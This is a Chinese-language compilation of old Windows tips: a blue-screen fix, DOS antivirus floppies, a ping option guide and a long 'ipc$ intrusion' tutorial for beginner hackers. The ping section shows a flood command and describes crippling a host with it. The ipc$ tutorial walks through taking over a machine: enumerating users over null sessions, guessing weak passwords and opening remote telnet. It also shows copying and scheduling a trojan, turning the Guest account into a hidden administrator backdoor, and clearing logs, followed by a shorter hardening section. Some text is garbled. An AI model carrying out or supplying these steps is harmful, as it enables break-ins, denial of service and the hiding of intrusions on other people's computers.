通常的原因:驱动程序或系统DLL已经被损坏。 解决方法:运行故障复控台,并且允许系统修复任何检测到的错误。 如果在RAM添加到计算机之后,立即发生错误,那么可能是分页文件损坏,或者新RAM由故障或不兼容。删除Pagefile.sys并将系统返回到原来的RAM配置。 运行由计算机制造商提供的所有的系统诊断软件,尤其是内存检查。
DOS杀毒: 杀毒软盘能杀灭一些在Windows环境下难以清除的病毒,尤其是引导型病毒,因此,当你在Windows环境下杀过毒后,别忘了再在DOS模式下杀一遍。有些杀毒软盘在你购买杀毒软件时就附带有,有些则没有,要你在安装杀毒软件的后期自行制作,对于一些在网上下载的杀毒软件来说更是如此。制作的方法一般都很简单只需按照屏幕提示操作就可以了。 使用时有些要你用启动盘启动计算机引导其进入DOS环境再往软驱上插入杀毒软盘再进行杀毒,有些则只需你在启动计算机前插入杀毒软盘,计算机启动后它就会自动进行杀毒程序。
但有时我们会遇到某些在网上下载的杀毒软件在你自行制作了杀毒软盘后却不能像上面说的那样直接自动进入到DOS模式下杀毒,这时就要你自己找到该杀毒盘的杀毒程序文件在DOS模式下作为命令来启动它了,那怎么找呢?方法如下: ㈠、将一张已制作好的用于DOS环境下杀毒的软盘放进软驱。 ㈡、在Windows环境下进行杀毒测试。 ⑴、先在Windows中打开该软盘,然后再从“开始-程序-MS-DOS方式”打开DOS窗口。 ⑵、将鼠标移至任务栏并按下右键,在弹出的快捷菜单中选择“横向平铺窗口”或“纵向平铺窗口”并单击,以便能同时在A盘窗口和DOS窗口两个窗口中工作。 ⑶、在打开的软盘文件中看看有哪些最尾的字样为“EXE”的文件(即扩展名为EXE的程序文件),并将它作为命令输进MS-DOS窗口,再看看它能不能被启动并查杀病毒,如果不能就再找下一个这类的文件测试,直到找到为止,找到并经测试后确认它能被运行就可以确定它是杀毒引擎的文件了,然后按“ESC”键停止该程序的运行,再将该杀毒引擎的文件名用笔抄下来,作为在纯DOS下杀毒的命令,最后关闭MS-DOS窗口。注意:有些杀毒软盘不支持在Windows环境的DOS模式下杀毒,如瑞星2001标准版,这时,在找到该杀毒引擎的文件后它会给出提示,这样也同样可以确定它是杀毒引擎的文件。 ㈢、进入纯DOS环境后进行杀毒。 在纯DOS模式下进行杀毒和在Windows环境的DOS模式下进行杀毒测试时启动杀毒引擎所需输入的命令是一样的。
Ping 命令完全讲解 (转载) 对于ping指令相信大家已经再熟悉不过了,但是能把ping的功能发挥到最大的人却并不是很多,当然我也并不是说我可以让ping发挥最大的功能,我也只不过经常用ping这个工具,也总结了一些小经验,现在和大家分享一下。
现在我就参照ping指令的辅助说明来给大家讲我使用ping时会用到的技巧,ping只有在安装了TCP/IP通讯协议以后才可以使用:
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list
Options:
-t Ping the specified host until stopped.To see statistics and continue - type Control-BTo stop - type Control-C.
不停的ping地方主机,直到你按下Control-C。
此功能?有什么特别的技巧,不过可以配合其它参数使用,将在下面提到。
-a Resolve addresses to hostnames.
解析计算机NetBios名。
例:C:\&ping -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 time&10ms TTL=254
Reply from 192.168.1.21: bytes=32 time&10ms TTL=254
Reply from 192.168.1.21: bytes=32 time&10ms TTL=254
Reply from 192.168.1.21: bytes=32 time&10ms TTL=254
Ping statistics for 192.168.1.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。
-n count Number of echo requests to send.
发送count指定的Echo数据包数。
在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下?知:
C:\&ping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。
-l size Send buffer size.
定义echo数据包大小。
在默认的情?下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其它系统)就是当向对方一次发送的数据包大于或等于65532时,对方就很有可能当机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制,但这个参数配合其它参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有攻击性的指令:(以下介绍带有危险性,只用于试验,请勿轻易施于别人计算机上,否?后果自负)
C:\&ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 time&10ms TTL=254
Reply from 192.168.1.21: bytes=65500 time&10ms TTL=254
………………
这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包,如果你只有一台计算机也许?有什么效果,但如果有很多台计算机那么就可以使对方完全瘫痪,我曾经就做过这样的试验,当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时,不到5分钟对方的网络就已经完全瘫痪,网络严重堵塞,HTTP和FTP服务完全停止,由此可见威力非同小可。
-f Set Don‘t Fragment flag in packet.
在数据包中发送“不要分段”标志。
在一般你所发送的数据包都会通过路由分段再发送给对方,加上此参数以后路由就不会再分段处理。
-i TTL Time To Live.
指定TTL值在对方的系统里停留的时间。
此参数同样是帮助你检查网络运转情况的。
-v TOS Type Of Service.
将“服务类型”字段设置为tos指定的值。
-r count Record route for count hops.
在“记录路由”字段中记录伝出和返回数据包的路由。
在一般情况下你发送的数据包是通过一个个路由才到达对方的,但到底是经过了哪些路由呢?通过此参数就可以设定你想探测经过的路由的个数,不过限制在了9个,也就是说你只能跟踪到9个路由,如果想探测更多,可以通过其它命令实现,我将在以后的文章中给大家讲解。以下为筥例:
C:\&ping -n 1 -r 9 202.96.105.101(发送一个数据包,最多记录9个路由)
Pinging 202.96.105.101 with 32 bytes of data:
Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 -&
202.107.210.214 -&
61.153.112.70 -&
61.153.112.89 -&
202.96.105.149 -&
202.96.105.97 -&
202.96.105.101 -&
202.96.105.150 -&
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。
-s count Timestamp for count hops.
指定count指定的?点数的时间戳。
此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。
-j host-list Loose source route along host-list.
利用computer-list指定的计算机列表路由数据包。连续计算机可以被中间关网?分隔(路由稀疏源)IP允许的最大?量为9。
-k host-list Strict source route along host-list.
利用computer-list指定的计算机列表路由数据包。连续计算机不能被中间网?分隔(路由?格源)IP允许的最大数量为9。
-w timeout Timeout in milliseconds to wait for each reply.
指定超时间隔,单位为毫秒。
此参数?有什么其它技巧。
ping指令的其它技巧:在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系?返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系?可以通过修改注?表以下键值实现:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
&DefaultTTL&=dword:000000ff
255---FF
128---80
64----40
32----20
好了,ping命令也基本上完全讲解完了,其中还有-j,-k参数我还没有详细说明,由于某些原因也包括我自己所收集的资料过少这里也?有向大家详细介绍,请大家见谅,如果在看了这篇文章的朋友当中有知道得比我更多的,以及其它使用技巧的也希望您能告知我,并在此先谢过。
菜鸟必备:ipc$详细解释大全 一 前言 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的种种迷惑(你随便找一个hack论坛搜一下ipc$,看看存在的疑惑有多少)。因此我参考了网上的一些资料,教程以及论坛帖子,写了这篇总结性质的文章,想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地! 注意:本文所讨论的各种情况均默认发生在win NT/2000环境下,win98将不在此次讨论之列,而鉴于win Xp在安全设置上有所提高,个别操作并不适用,有机会将单独讨论。 二 什么是ipc$ IPC$(Internet Process Connection)是共享&命名管道&的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。 平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。那么什么是空会话呢? 三 什么是空会话 在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。 在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下: 1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建 立; 2)服务器产生一个随机的64位数(实现挑战)传送回客户; 3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结 果返回到服务器(实现响应); 4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号,核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。 以上是一个安全会话建立的大致过程,那么空会话又如何呢? 空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID(它标识了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的SID,用户名是:ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组: Everyone Network 在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢? 四 空会话可以做什么 对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,这对于一个老练的黑客已经足够了。以下是空会话中能够使用的具体命令: 1 首先,我们先建立一个空会话(需要目标开放ipc$) 命令:net use \\ip\ipc$ && /user:&& 注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。 2 查看远程主机的共享资源 命令:net view \\IP 解释:建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下类似类似结果: 在 \\*.*.*.*的共享资源 资源共享名 类型 用途 注释 ----------------------------------------------------------- NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成。 3 查看远程主机的当前时间 命令:net time \\IP 解释:用此命令可以得到一个远程主机的当前时间。 4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT) nbtstat -A IP 用此命令可以得到一个远程主机的NetBIOS用户名列表(需要你的netbios支持),返回如下结果: Node IpAddress: [*.*.*.*] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- SERVER &00& UNIQUE Registered OYAMANISHI-H &00& GROUP Registered OYAMANISHI-H &1C& GROUP Registered SERVER &20& UNIQUE Registered OYAMANISHI-H &1B& UNIQUE Registered OYAMANISHI-H &1E& GROUP Registered SERVER &03& UNIQUE Registered OYAMANISHI-H &1D& UNIQUE Registered ..__MSBROWSE__.&01& GROUP Registered INet~Services &1C& GROUP Registered IS~SERVER......&00& UNIQUE Registered MAC Address = 00-50-8B-9A-2D-37 以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在EventLog中留下记录,不管你是否登录成功。 好了,那么下面我们就来看看ipc$所使用的端口是什么 五 ipc$所使用的端口 首先我们来了解一些基础知识: 1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务; 2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。 3 在WindowsNT中SMB基于NBT实现,而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现。 有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了: 对于win2000客户端来说: 1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败; 2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。由此可见,禁止了NBT后的win 2000对win NT的共享访问将会失败。 对于win2000服务器端来说: 1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放; 2 如果禁止NBT,那么只有445端口开放。 我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ipc$会话是无法建立的。 六 ipc$连接在hack攻击中的意义 就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,那你可就了不得了,基本上可以为所欲为了。不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些粗心的管理员存在弱口令,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码将会越来越难的,因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,甚至在主机不开启ipc$共享时,你根本就无法连接,你会慢慢的发现ipc$连接并不是万能的,所以不要奢望每次连接都能成功,那是不现实的。 是不是有些灰心?倒也不用,关键是我们要摆正心态,不要把ipc$入侵当作终极武器,不要认为它战无不胜,它只是很多入侵方法中的一种,你有可能利用它一击必杀,也有可能一无所获,这些都是正常的,在黑客的世界里,不是每条大路都能通往罗马,但总有一条路会通往罗马,耐心的寻找吧! 七 ipc$连接失败的常见原因 以下是一些常见的导致ipc$连接失败的原因: 1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的; 2 如果想成功的建立一个ipc$连接,就需要对方开启ipc$共享,即使是空连接也是这样,如果对方关闭了ipc$共享,你将会建立失败; 3 你未启动Lanmanworkstation服务,它提供网络链结和通讯,没有它你无法发起连接请求(显示名为:Workstation); 4 对方未启动Lanmanserver服务,它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它远程主机将无法响应你的连接请求(显示名为:Server); 5 对方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份; 6 对方禁止了NBT(即未打开139端口); 7 对方防火墙屏蔽了139和445端口; 8 你的用户名或者密码错误(显然空会话排除这种错误); 9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号&&即可; 10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。 另外,你也可以根据返回的错误号分析原因: 错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限; 错误号51,Windows无法找到网络路径:网络有问题; 错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$; 错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连; 错误号1326,未知的用户名或错误密码:原因很明显了; 错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动; 错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。 八 复制文件失败的原因 有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢? 1 盲目复制 这类错误出现的最多,占到50%以上。许多朋友甚至都不知道对方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下对方的共享情况,不要认为ipc$连接建立成功了就一定有共享文件夹。 2 默认共享判断错误 这类错误也是大家经常犯的,主要有两个小方面: 1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马上向admin$之类的默认共享复制文件,导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享,ipc$共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默认共享并不是ipc$共享的必要条件; 2)由于net view \\IP 无法显示默认共享(因为默认共享带$),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生) 3用户权限不够,包括四种情形: 1)空连接向所有共享(默认共享和普通共享)复制时,大多情况下权限是不够的; 2)向默认共享复制时,要具有管理员权限; 3)向普通共享复制时,要具有相应权限(即对方事先设定的访问权限); 4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享; 还需要说明一点:不要认为administrator就一定是管理员,管理员名称是可以改的。 4被防火墙杀死或在局域网 也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;还有可能你把木马复制到了局域网内的主机,导致连接失败。因此建议你复制时要小心,否则就前功尽弃了。 呵呵,大家也知道,ipc$连接在实际操作过程中会出现千奇百怪的问题,上面我所总结的只是一些常见错误,没说到的,只能让大家自己去体会了。 九 如何打开目标的IPC$共享以及其他共享 目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等,然后在shell下执行net share ipc$来开放目标的ipc$,用net share ipc$ /del来关闭共享。如果你要给它开共享文件夹,你可以用net share baby=c:\,这样就把它的c盘开为共享名为baby共享了。 十 一些需要shell才能完成的命令 看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令: 1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成; 2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成; 3 运行/关闭远程主机的服务,需要在shell下完成; 4 启动/杀掉远程主机的进程,也需要在shell下完成。 十一 入侵中可能会用到的相关命令 请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。 1 建立空连接: net use \\IP\ipc$ && /user:&& 2 建立非空连接: net use \\IP\ipc$ &psw& /user:&account& 3 查看远程主机的共享资源(但看不到默认共享) net view \\IP 4 查看本地主机的共享资源(可以看到本地的默认共享) net share 5 得到远程主机的用户名列表 nbtstat -A IP 6 得到本地主机的用户列表 net user 7 查看远程主机的当前时间 net time \\IP 8 显示本地主机当前服务 net start 9 启动/关闭本地服务 net start 服务名 /y net stop 服务名 /y 10 映射远程共享: net use z: \\IP\baby 此命令将共享名为baby的共享资源映射到z盘 11 删除共享映射 net use c: /del 删除映射的c盘,其他盘类推 net use * /del /y删除全部 12 向远程主机复制文件 copy \路径\srv.exe \\IP\共享目录名,如: copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内 13 远程添加计划任务 at \\ip 时间 程序名,如: at \\127.0.0.0 11:00 love.exe 注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径 14 开启远程主机的telnet 这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求: 1)目标开启了ipc$共享 2)你要拥有管理员密码和帐号 3)目标开启RemoteRegistry服务,用户就该ntlm认证 4)对WIN2K/XP有效,NT未经测试 命令格式:OpenTelnet.exe \\server account psw NTLM认证方式 port 试例如下:c:\&OpenTelnet.exe \\*.*.*.* administrator && 1 90 15 激活用户/加入管理员组 1 net uesr account /active:yes 2 net localgroup administrators account /add 16 关闭远程主机的telnet 同样需要一个小程序:ResumeTelnet.exe 命令格式:ResumeTelnet.exe \\server account psw 试例如下:c:\&ResumeTelnet.exe \\*.*.*.* administrator && 17 删除一个已建立的ipc$连接 net use \\IP\ipc$ /del (本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net) 十二 ipc$完整入侵步骤祥解 其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了! 1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空 2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧 3上面开telnet的命令没忘吧,要用到opentelnet这个小程序 c:\&OpenTelnet.exe \\192.168.21.* administrator && 1 90 如果返回如下信息 ******************************************************* Remote Telnet Configure, by refdom Email:
OpenTelnet.exe Usage:OpenTelnet.exe \\server username password NTLMAuthor telnetport ******************************************************* Connecting \\192.168.21.*...Successfully! NOTICE!!!!!! The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23 Starting telnet service... telnet service is started successfully! telnet service is running! BINGLE!!!Yeah!! Telnet Port is 90. You can try:&telnet ip 90&, to connect the server! Disconnecting server...Successfully! *说明你已经打开了一个端口90的telnet。 4 现在我们telnet上去 telnet 192.168.21.* 90 如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了 5 C:\&net user guest /active:yes *将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no 6 C:\&net user guest 1234 *将Guest的密码改为1234,或者改成你喜欢的密码 7 C:\&net localgroup administrators guest /add *将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。 8 好了,现在我们来走另一条路,给它传个木马玩玩 9 首先,我们先建立起ipc$连接 C:\&net use \\192.168.21.*\ipc$ && /user:administrator 10 既然要上传东西,就要先知道它开了什么共享 C:\&net view \\192.168.21.* 在 \\192.168.21.*的共享资源 资源共享名 类型 用途 注释 ----------------------------------------------------------- C Disk D Disk 命令成功完成。 *好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。 11 C:\© love.exe \\192.168.21.*\c 已复制 1 个文件 *用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现 12 运行木马前,我们先看看它现在的时间 net time \\192.168.21.* \\192.168.21.*的当前时间是
上午 11:00 命令成功完成 13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了 C:\&at \\192.168.21.* 11:02 c:\love.exe 新加了一项作业,其作业 ID = 1 14 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了 嗯,好了,两种基本方法都讲了。如果你对上面的操作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec执行木马,用命令:psexec \\tergetIP -u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。 讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面 十三 如何防范ipc$入侵 1 禁止空连接进行枚举(此操作并不能阻止空连接的建立) 方法1: 运行regedit,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:1 如果设置为&1&,一个匿名用户仍然可以连接到IPC$共享,但限制通过这种连接得到列举SAM帐号和共享等信息;在Windows 2000 中增加了&2&,限制所有匿名访问除非特别授权,如果设置为2的话,可能会有一些其他问题发生,建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。 方法2: 在本地安全设置-本地策略-安全选项-在‘对匿名连接的额外限制‘中做相应设置 2 禁止默认共享 1)察看本地共享资源 运行-cmd-输入net share 2)删除共享(重起后默认共享仍然存在) net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete(如果有e,f,……可以继续删除) 3)停止server服务 net stop server /y (重新启动后server服务会重新开启) 4)禁止自动打开默认共享(此操作并未关闭ipc$共享) 运行-regedit server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:。 pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:。 如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。 这两个键值在默认情况下在主机上是不存在的,需要自己手动添加。 3 关闭ipc$和默认共享依赖的服务:server服务 控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-选已禁用 这时可能会有提示说:XXX服务也会关闭是否继续,因为还有些次要的服务要依赖于lanmanserver,不要管它。 4 屏蔽139,445端口 由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445端口同样可以阻止ipc$入侵。 1)139端口可以通过禁止NBT来屏蔽 本地连接-TCP/IT属性-高级-WINS-选‘禁用TCP/IT上的NETBIOS’一项 2)445端口可以通过修改注册表来屏蔽 添加一个键值 Hive: HKEY_LOCAL_MACHINE Key: System\Controlset\Services\NetBT\Parameters Name: SMBDeviceEnabled Type: REG_DWORD Value: 0 修改完后重启机器 注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。 3)安装防火墙进行端口过滤 5 设置复杂密码,防止通过ipc$穷举出密码。 十四 ipc$入侵问答精选 上面说了一大堆的理论东西,但在实际中你会遇到各种各样的问题,因此为了给予大家最大的帮助,我看好几个安全论坛,找了n多的帖子,从中整理了一些有代表性的问答,其中的一些答案是我给出的,一些是论坛上的回复,如果有什么疏漏和错误,还请包涵。 1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗? 答:留下记录是一定的,你走后用程序删除就可以了,或者用肉鸡入侵。 2.你看下面的情况是为什么,可以连接但不能复制 net use \\***.***.***.***\ipc$ &密码& /user:&用户名& 命令成功 copy icmd.exe \\***.***.***.***\admin$ 找不到网络路径 命令不成功 答:可能有两个原因: 1)你的权限不够,不能访问默认共享; 2)对方没有开启admin$默认共享,不要认为能进行ipc$连接,对方就一定开了默认共享(很多人都这么以为,误区!!),此时你可以试试别的默认共享或普通共享,比如c$,d$,c,d等,如果还是不行,就要看你的权限了,如果是管理员权限,你可以开telnet,如果能成功,在给它开共享也行。 3.如果对方开了IPC$,且能建立空联接,但打开C、D盘时,都要求密码,我知道是空连接没有太多的权限,但没别的办法了吗? 答:建议先用流光或者别的什么猜解一下密码,如果猜不出来,只能放弃,毕竟空连接的能力有限。 4.我已经猜解到了管理员的密码,且已经ipc$连接成功了,但net view \\ip发现它没开默认共享,我该怎么办? 答:首先纠正你的一个错误,用net view是无法看到默认共享的。既然你现在有管理员权限,而且对方又开了ipc$,建议你用opentelnet.exe这个小程序打开它的telent,在获得了这个shell之后,做什么都可以了。 5.ipc$连接成功后,我用下面的命令建立了一个帐户,却发现这个帐户在我自己的机器上,这是怎么回事? net uset ccbirds /add 答:ipc$建立成功只能说明你与远程主机建立了通信隧道,并不意味你取得了一个shell,只有在获得一个shell之后,你才能在远程建立一个帐户,否则你的操作只是在本地进行。 